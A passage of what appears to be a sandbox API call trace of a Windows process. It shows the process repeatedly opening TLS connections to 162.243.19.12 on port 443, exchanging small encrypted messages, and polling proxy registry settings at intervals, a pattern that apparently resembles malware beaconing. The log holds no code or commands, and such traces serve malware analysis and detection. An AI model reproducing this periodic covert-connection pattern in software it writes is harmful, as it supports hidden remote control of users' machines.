	[0315.541] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0315.542] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0315.542] shutdown (s=0x7d0, how=2) returned 0
	[0315.543] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0315.543] closesocket (s=0x7d0) returned 0
	[0315.544] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0315.544] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0315.544] WSAConnect (in: s=0x7d0, name=0x2ad23be4470*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0315.652] closesocket (s=0x9d8) returned 0
	[0315.652] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23be1418, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23be4cf8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23be4cf8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0315.653] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfc30 | out: pvContextBuffer=0x2ad3badfc30) returned 0x0
	[0315.653] send (in: s=0x7d0, buf=0x2ad23be4dc8*, len=333, flags=0 | out: buf=0x2ad23be4dc8*) returned 333
	[0315.653] recv (in: s=0x7d0, buf=0x2ad23be4dc8, len=5, flags=0 | out: buf=0x2ad23be4dc8*) returned 5
	[0315.759] recv (in: s=0x7d0, buf=0x2ad23be4dcd, len=49, flags=0 | out: buf=0x2ad23be4dcd*) returned 49
	[0315.759] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23be1418, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23be5008, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23be5028, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23be5028, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0315.760] recv (in: s=0x7d0, buf=0x2ad23be5118, len=5, flags=0 | out: buf=0x2ad23be5118*) returned 5
	[0315.760] recv (in: s=0x7d0, buf=0x2ad23be513d, len=1, flags=0 | out: buf=0x2ad23be513d*) returned 1
	[0315.760] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23be1418, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23be5210, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23be5230, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23be5230, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0315.760] recv (in: s=0x7d0, buf=0x2ad23be5320, len=5, flags=0 | out: buf=0x2ad23be5320*) returned 5
	[0315.760] recv (in: s=0x7d0, buf=0x2ad23be5345, len=48, flags=0 | out: buf=0x2ad23be5345*) returned 48
	[0315.760] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23be1418, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23be5448, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23be5468, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23be5468, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0315.761] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2a80 | out: pvContextBuffer=0x2ad3bad2a80) returned 0x0
	[0315.761] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23be55b0 | out: pBuffer=0x2ad23be55b0) returned 0x0
	[0315.761] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23be5608 | out: pBuffer=0x2ad23be5608) returned 0x0
	[0315.761] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23be5670 | out: pBuffer=0x2ad23be5670) returned 0x0
	[0315.761] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0315.761] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0315.761] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb06350
	[0315.762] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0315.762] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb06350) returned 0x0
	[0315.762] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0315.762] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0315.762] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0315.762] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb06350, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0315.762] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06350, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0315.763] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0315.765] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0315.765] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0315.766] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0315.767] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0315.767] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0315.767] SetLastError (dwErrCode=0x0) 
	[0315.767] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0315.767] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0315.767] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0315.767] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23be8278, MessageSeqNo=0x0 | out: pMessage=0x2ad23be8278) returned 0x0
	[0315.767] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca4c0
	[0315.767] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca4c0*=((len=0x3b, buf=0x2ad23be5538*), (len=0xd5, buf=0x2ad23be8080*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca4c0*=((len=0x3b, buf=0x2ad23be5538*), (len=0xd5, buf=0x2ad23be8080*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0315.768] CoTaskMemFree (pv=0x2ad3baca4c0) 
	[0315.768] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0315.768] recv (in: s=0x7d0, buf=0x2ad23be8420, len=5, flags=0 | out: buf=0x2ad23be8420*) returned 5
	[0316.257] recv (in: s=0x7d0, buf=0x2ad23be8445, len=1488, flags=0 | out: buf=0x2ad23be8445*) returned 1488
	[0316.257] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23be8b28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23be8b28, pfQOP=0x0) returned 0x0
	[0316.258] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0316.258] SetEvent (hEvent=0x6b8) returned 1
	[0316.304] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0323.310] CloseHandle (hObject=0x388) returned 1
	[0323.320] _vsnwprintf_s (in: _Buffer=0xd7ef71bf18, _BufferCount=0x19, _MaxCount=0x18, _Format="%hu.", _ArgList=0xd7ef71be88 | out: _Buffer="2.") returned 2
	[0323.614] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0323.615] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0323.615] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0323.616] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0323.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0323.617] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0323.617] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0323.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0323.618] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0323.618] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0323.619] GetCurrentProcess () returned 0xffffffffffffffff
	[0323.619] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0323.619] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1a780
	[0323.620] WinHttpSetTimeouts (hInternet=0x2ad3bb1a780, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0323.620] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0323.639] SetEvent (hEvent=0x6b8) returned 1
	[0323.640] select (in: nfds=0, readfds=0x2ad23bf0550, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bf0550, writefds=0x0, exceptfds=0x0) returned 1
	[0323.640] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0323.644] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0323.646] shutdown (s=0x7d0, how=2) returned 0
	[0323.648] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0323.648] closesocket (s=0x7d0) returned 0
	[0323.649] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0323.650] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0323.650] WSAConnect (in: s=0x7d0, name=0x2ad23bf1ce8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0323.759] closesocket (s=0x9d8) returned 0
	[0323.760] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23beec90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bf2570, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bf2570, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0323.761] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfc30 | out: pvContextBuffer=0x2ad3badfc30) returned 0x0
	[0323.761] send (in: s=0x7d0, buf=0x2ad23bf2640*, len=333, flags=0 | out: buf=0x2ad23bf2640*) returned 333
	[0323.762] recv (in: s=0x7d0, buf=0x2ad23bf2640, len=5, flags=0 | out: buf=0x2ad23bf2640*) returned 5
	[0323.873] recv (in: s=0x7d0, buf=0x2ad23bf2645, len=49, flags=0 | out: buf=0x2ad23bf2645*) returned 49
	[0323.873] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23beec90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bf2880, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bf28a0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bf28a0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0323.873] recv (in: s=0x7d0, buf=0x2ad23bf2990, len=5, flags=0 | out: buf=0x2ad23bf2990*) returned 5
	[0323.873] recv (in: s=0x7d0, buf=0x2ad23bf29b5, len=1, flags=0 | out: buf=0x2ad23bf29b5*) returned 1
	[0323.873] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23beec90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bf2a88, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bf2aa8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bf2aa8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0323.874] recv (in: s=0x7d0, buf=0x2ad23bf2b98, len=5, flags=0 | out: buf=0x2ad23bf2b98*) returned 5
	[0323.874] recv (in: s=0x7d0, buf=0x2ad23bf2bbd, len=48, flags=0 | out: buf=0x2ad23bf2bbd*) returned 48
	[0323.874] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23beec90, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bf2cc0, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bf2ce0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bf2ce0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0323.875] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2a80 | out: pvContextBuffer=0x2ad3bad2a80) returned 0x0
	[0323.875] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bf2e28 | out: pBuffer=0x2ad23bf2e28) returned 0x0
	[0323.876] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bf2e80 | out: pBuffer=0x2ad23bf2e80) returned 0x0
	[0323.876] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bf2ee8 | out: pBuffer=0x2ad23bf2ee8) returned 0x0
	[0323.876] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04950) returned 0x2ad3bb04950
	[0323.877] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0323.877] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb04950
	[0323.877] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04950) returned 0x2ad3bb04950
	[0323.877] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb04950) returned 0x0
	[0323.877] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0323.878] CertFreeCertificateContext (pCertContext=0x2ad3bb04950) returned 1
	[0323.879] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0323.879] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb04950, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0323.880] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04950, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0323.882] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0323.884] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04950) returned 0x2ad3bb04950
	[0323.885] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0323.885] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0323.886] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0323.886] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0323.886] SetLastError (dwErrCode=0x0) 
	[0323.886] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0323.887] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0323.887] CertFreeCertificateContext (pCertContext=0x2ad3bb04950) returned 1
	[0323.888] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bf5af0, MessageSeqNo=0x0 | out: pMessage=0x2ad23bf5af0) returned 0x0
	[0323.888] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca1f0
	[0323.888] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca1f0*=((len=0x3b, buf=0x2ad23bf2db0*), (len=0xd5, buf=0x2ad23bf58f8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca1f0*=((len=0x3b, buf=0x2ad23bf2db0*), (len=0xd5, buf=0x2ad23bf58f8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0323.889] CoTaskMemFree (pv=0x2ad3baca1f0) 
	[0323.889] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0323.889] recv (in: s=0x7d0, buf=0x2ad23bf5c98, len=5, flags=0 | out: buf=0x2ad23bf5c98*) returned 5
	[0324.414] recv (in: s=0x7d0, buf=0x2ad23bf5cbd, len=1488, flags=0 | out: buf=0x2ad23bf5cbd*) returned 1488
	[0324.414] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bf63a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bf63a0, pfQOP=0x0) returned 0x0
	[0324.415] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0324.415] SetEvent (hEvent=0x6b8) returned 1
	[0324.453] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0340.456] CloseHandle (hObject=0x388) returned 1
	[0340.632] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0340.633] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0340.633] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0340.633] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0340.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0340.635] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0340.635] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0340.636] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0340.636] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0340.636] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0340.637] GetCurrentProcess () returned 0xffffffffffffffff
	[0340.638] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0340.638] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1abc0
	[0340.639] WinHttpSetTimeouts (hInternet=0x2ad3bb1abc0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0340.639] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0340.657] SetEvent (hEvent=0x6b8) returned 1
	[0340.658] select (in: nfds=0, readfds=0x2ad23bfddc8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bfddc8, writefds=0x0, exceptfds=0x0) returned 1
	[0340.658] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0340.660] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0340.662] shutdown (s=0x7d0, how=2) returned 0
	[0340.687] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0340.687] closesocket (s=0x7d0) returned 0
	[0340.689] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0340.690] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0340.690] WSAConnect (in: s=0x7d0, name=0x2ad23bff560*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0340.800] closesocket (s=0x9d8) returned 0
	[0340.801] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bfc508, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bffde8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bffde8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0340.803] FreeContextBuffer (in: pvContextBuffer=0x2ad3badff10 | out: pvContextBuffer=0x2ad3badff10) returned 0x0
	[0340.803] send (in: s=0x7d0, buf=0x2ad23bffeb8*, len=333, flags=0 | out: buf=0x2ad23bffeb8*) returned 333
	[0340.803] recv (in: s=0x7d0, buf=0x2ad23bffeb8, len=5, flags=0 | out: buf=0x2ad23bffeb8*) returned 5
	[0340.910] recv (in: s=0x7d0, buf=0x2ad23bffebd, len=49, flags=0 | out: buf=0x2ad23bffebd*) returned 49
	[0340.910] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bfc508, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c000f8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c00118, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c00118, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0340.910] recv (in: s=0x7d0, buf=0x2ad23c00208, len=5, flags=0 | out: buf=0x2ad23c00208*) returned 5
	[0340.910] recv (in: s=0x7d0, buf=0x2ad23c0022d, len=1, flags=0 | out: buf=0x2ad23c0022d*) returned 1
	[0340.911] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bfc508, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c00300, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c00320, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c00320, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0340.911] recv (in: s=0x7d0, buf=0x2ad23c00410, len=5, flags=0 | out: buf=0x2ad23c00410*) returned 5
	[0340.911] recv (in: s=0x7d0, buf=0x2ad23c00435, len=48, flags=0 | out: buf=0x2ad23c00435*) returned 48
	[0340.911] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bfc508, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c00538, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c00558, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c00558, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0340.913] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3200 | out: pvContextBuffer=0x2ad3bad3200) returned 0x0
	[0340.913] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c006a0 | out: pBuffer=0x2ad23c006a0) returned 0x0
	[0340.913] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c006f8 | out: pBuffer=0x2ad23c006f8) returned 0x0
